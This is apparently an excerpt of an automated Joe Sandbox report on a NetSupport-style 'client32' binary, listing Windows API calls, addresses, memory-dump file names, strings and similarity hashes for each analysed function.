                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110032C3
                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 110032E7
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 110032F9
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 4241058051-934300333
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 111192A1
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111192B6
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11119337
                                                                                                                                                                • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                                                                                                • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                                                                                                • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4245181967-0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110EF833
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                                                                                                • _strncat.LIBCMT ref: 1102518B
                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                                                                                                • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                                                                                                • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                                                                                                • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                                                                                                • SetFocus.USER32(?), ref: 11025265
                                                                                                                                                                  • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3832070631-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000000,?,76968400), ref: 11143720
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11143733
                                                                                                                                                                • GetFileVersionInfoSizeA.VERSION(?,?), ref: 11143753
                                                                                                                                                                • _malloc.LIBCMT ref: 1114375F
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114377D
                                                                                                                                                                • _free.LIBCMT ref: 1114378D
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • VerQueryValueA.VERSION(?,1119958C,?,?,?,?,00000000,00000000,?), ref: 111437BE
                                                                                                                                                                • _free.LIBCMT ref: 111437E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1929493397-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111314C6,00000000,?), ref: 110EF428
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111314C6,00000000,?), ref: 110EF43D
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF45F
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 110EF46C
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF47B
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF48B
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF4A5
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 110EF4AC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3489003387-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11088970: IsWindow.USER32(?), ref: 1108898F
                                                                                                                                                                  • Part of subcall function 11088970: IsWindow.USER32(?), ref: 1108899D
                                                                                                                                                                • GetParent.USER32(00000000), ref: 110896E6
                                                                                                                                                                • GetParent.USER32(00000000), ref: 110896F7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ParentWindow
                                                                                                                                                                • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                                                                                                • API String ID: 3530579756-3361795001
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,59FD48C0,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                                                                                                  • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                                                                                • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                                                                                                • API String ID: 3780373956-3165951319
                                                                                                                                                                • Opcode ID: 53057ca7014f2598cfe3f9c75758400a00b16893141128018dff47bec75b6422
                                                                                                                                                                • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                                                                                                • Opcode Fuzzy Hash: 53057ca7014f2598cfe3f9c75758400a00b16893141128018dff47bec75b6422
                                                                                                                                                                • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071554
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                                                                                                • API String ID: 624642848-3840833929
                                                                                                                                                                • Opcode ID: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                                                                                                • Instruction ID: f6d3c874c1d1c48a5cbc4b1d223e4c094ec3a892b4c0f1e6412567ed65325da8
                                                                                                                                                                • Opcode Fuzzy Hash: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                                                                                                • Instruction Fuzzy Hash: F061C775E04285DFD715CF68C480FAABBF6FB08318F0985A9E8968B2C1D774E944CB94
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1101F501
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F615
                                                                                                                                                                • GetSaveFileNameA.COMDLG32(?), ref: 1101F637
                                                                                                                                                                • _fputs.LIBCMT ref: 1101F663
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                                                                • String ID: ChatPath$X
                                                                                                                                                                • API String ID: 2661292734-3955712077
                                                                                                                                                                • Opcode ID: db4f3b619d315f2bbf7e3485c087bbc2770cef59e8a98ff41368cab619112884
                                                                                                                                                                • Instruction ID: a33b43f520b97c5360942022e582a7bde0abed0a0bd5764f507ed7251157f071
                                                                                                                                                                • Opcode Fuzzy Hash: db4f3b619d315f2bbf7e3485c087bbc2770cef59e8a98ff41368cab619112884
                                                                                                                                                                • Instruction Fuzzy Hash: DB51B574D04329AFDB20DF60CC48B9EBBB4AF45708F0046D9D9096B290EB75EA44CF91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                  • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                  • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                  • Part of subcall function 11071500: EnterCriticalSection.KERNEL32(?,59FD48C0,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071554
                                                                                                                                                                  • Part of subcall function 11071500: LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                                                                                                  • Part of subcall function 11071500: LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,00000000), ref: 110717C9
                                                                                                                                                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110717D9
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110717E7
                                                                                                                                                                  • Part of subcall function 1110FC10: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BE4B), ref: 1110FC18
                                                                                                                                                                  • Part of subcall function 1110FC10: LeaveCriticalSection.KERNEL32(00000010), ref: 1110FC25
                                                                                                                                                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 11071822
                                                                                                                                                                  • Part of subcall function 1110FC10: LeaveCriticalSection.KERNEL32(00000010,?), ref: 1110FC60
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                 • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                 • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterMessage$EventInitialize$CreateCurrentDispatchThreadTimer
                                                                                                                                                                • String ID: Receive$uj
                                                                                                                                                                • API String ID: 450530131-2059908200
                                                                                                                                                                • Opcode ID: 2fa3a773f6bc917990c13475068b23d20034799599438ba5b562ac3510b02e30
                                                                                                                                                                • Instruction ID: 016ae389b66accaab653c5318acd7ac0fe13e28cef998fca003f328108609293
                                                                                                                                                                • Opcode Fuzzy Hash: 2fa3a773f6bc917990c13475068b23d20034799599438ba5b562ac3510b02e30
                                                                                                                                                                • Instruction Fuzzy Hash: 06318575B50316ABEB18DBA1CC42FFEB379FB44B14F404528E621AA1C0EBB4B504C7A5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                                                                                                  • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                                                                                                  • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                                                                                                  • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                                                                                  • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3136964118-2830328467
                                                                                                                                                                • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                                                                                • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                                                                                                • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                                                                                • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 11039435
                                                                                                                                                                • GetClassNameA.USER32(00000000,?,00000040), ref: 1103945B
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110394E8
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1103950B
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,?), ref: 11039524
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ClassItemNamePointsRect_malloc_memsetwsprintf
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 2434965487-2167791130
                                                                                                                                                                • Opcode ID: b9f8c25bce05456a1ac1130d92197645ea9678c6f58a168908617c2ae6c35c02
                                                                                                                                                                • Instruction ID: 94acfc0917b3b9f4953dcedb551f98c3703ae943f2dcdee60a79eb2a958a1b92
                                                                                                                                                                • Opcode Fuzzy Hash: b9f8c25bce05456a1ac1130d92197645ea9678c6f58a168908617c2ae6c35c02
                                                                                                                                                                • Instruction Fuzzy Hash: CE417E75A0060A9FD714CFA4CD84FAFF7B9FB84319F008519EA6697384EB74A904CB50
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 111370A6
                                                                                                                                                                • _free.LIBCMT ref: 111370DD
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • _free.LIBCMT ref: 1113716D
                                                                                                                                                                  • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                                                                                                • _free.LIBCMT ref: 1113713E
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                                                                                                • String ID: *HelpReqServer$Client
                                                                                                                                                                • API String ID: 1390041139-3616015116
                                                                                                                                                                • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                                                                                • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                                                                                                • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                                                                                • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110D8200: __CxxThrowException@8.LIBCMT ref: 110D8283
                                                                                                                                                                  • Part of subcall function 110D8200: gethostbyname.WSOCK32(0.0.0.0,59FD48C0,?,?,00000000), ref: 110D8295
                                                                                                                                                                  • Part of subcall function 110D8200: WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11186BEB), ref: 110D82A1
                                                                                                                                                                  • Part of subcall function 110D8200: _memmove.LIBCMT ref: 110D82CB
                                                                                                                                                                  • Part of subcall function 110D8200: htons.WSOCK32(00000000), ref: 110D82F1
                                                                                                                                                                  • Part of subcall function 110D8200: socket.WSOCK32(00000002,00000001,00000000), ref: 110D8305
                                                                                                                                                                  • Part of subcall function 110D8200: WSAGetLastError.WSOCK32 ref: 110D8313
                                                                                                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)...,?,00000000,?,?,00000000), ref: 110DD708
                                                                                                                                                                  • Part of subcall function 110DE840: EnterCriticalSection.KERNEL32(111ED0A4,110185F8,59FD48C0,?,?,?,111CC6F8,11186998,000000FF,?,1101A642), ref: 110DE841
                                                                                                                                                                Strings
                                                                                                                                                                • NsAppSystem Info : Stopped Listening On Control Channel For Connections..., xrefs: 110DD6F6
                                                                                                                                                                • NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)..., xrefs: 110DD703
                                                                                                                                                                • NsAppSystem Info : Control Channel Connected To NsStudent App..., xrefs: 110DD7BA
                                                                                                                                                                • NsAppSystem Info : INCOMING Control Channel Connection..., xrefs: 110DD72C
                                                                                                                                                                • NsAppSystem Info : Control Channel Listening for Connections..., xrefs: 110DD6B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CriticalDebugEnterException@8OutputSectionStringThrow_memmovegethostbynamehtonssocket
